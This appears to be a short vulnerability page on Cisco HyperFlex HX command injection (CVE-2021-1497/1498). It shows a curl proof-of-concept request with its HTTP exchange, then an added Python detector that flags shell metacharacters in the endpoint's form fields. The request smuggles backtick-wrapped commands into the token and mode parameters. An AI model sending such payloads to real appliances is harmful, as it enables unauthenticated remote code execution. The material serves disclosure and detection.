1.04 KB / 2021-05-21 09:14:38
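# Cisco HyperFlex HX Command Injection (CVE-2021-1497/CVE-2021-1498)
Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.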
```
wvu@kharak:~$ curl -v http://192.168.123.133/storfs-asup -d 'action=&token=`id`&mode=`id`'
* Trying 192.168.123.133...
* TCP_NODELAY set
* Connected to 192.168.123.133 (192.168.123.133) port 80 (#0)
> POST /storfs-asup HTTP/1.1
> Host: 192.168.123.133
> User-Agent: curl/7.64.1
> Accept: */*
> Content-Length: 28
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 28 out of 28 bytes
< HTTP/1.1 200 OK
< Server: nginx/1.8.1
< Date: Tue, 18 May 2021 00:54:26 GMT
< Content-Length: 0
< Connection: keep-alive
< Front-End-Https: on
<
* Connection #0 to host 192.168.123.133 left intact
* Closing connection 0
wvu@kharak:~$
```
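
A detection check for the request shown above, as an added example that is not part of the original page or of any Cisco tooling: it flags POSTs to `/storfs-asup` whose `token` or `mode` value contains shell metacharacters after percent-decoding. It assumes a reverse proxy or WAF that records the method, request target and raw form body; the sample records and the function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Endpoint and parameter names come from the request shown above.
WATCHED_PATH = "/storfs-asup"
WATCHED_PARAMS = {"token", "mode"}
# Characters a POSIX shell uses for substitution, chaining or redirection.
SHELL_META = re.compile(r"[`$;|&<>(){}\n\r\\]")


def suspicious_params(method, target, body):
    """Return the watched parameters whose decoded value holds shell metacharacters."""
    if method.upper() != "POST":
        return []
    if urlsplit(target).path.rstrip("/") != WATCHED_PATH:
        return []
    hits = set()
    # parse_qsl percent-decodes, so %60id%60 is inspected as `id`.
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name in WATCHED_PARAMS and SHELL_META.search(value):
            hits.add(name)
    return sorted(hits)


def scan(records):
    """Return (record_index, flagged_params) for each request that should raise an alert."""
    return [(i, hits) for i, r in enumerate(records) if (hits := suspicious_params(*r))]


# Constructed sample records: (method, request target, raw form body).
SAMPLE = [
    ("POST", "/storfs-asup", "action=&token=`id`&mode=`id`"),        # body from the page
    ("POST", "/storfs-asup", "action=&token=%60id%60&mode=normal"),  # same value, percent-encoded
    ("POST", "/storfs-asup", "action=&token=abc123&mode=normal"),    # constructed benign values
    ("GET", "/storfs-asup", ""),                                     # not a POST, ignored
    ("POST", "/login", "token=`id`"),                                # other endpoint, ignored
]

if __name__ == "__main__":
    for index, params in scan(SAMPLE):
        print(f"record {index}: shell metacharacters in {', '.join(params)}")
```
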
ref:
* https://attackerkb.com/topics/mDqlWhQovO/cve-2021-1497?referrer=home
* https://nvd.nist.gov/vuln/detail/CVE-2021-1497
* https://nvd.nist.gov/vuln/detail/CVE-2021-1498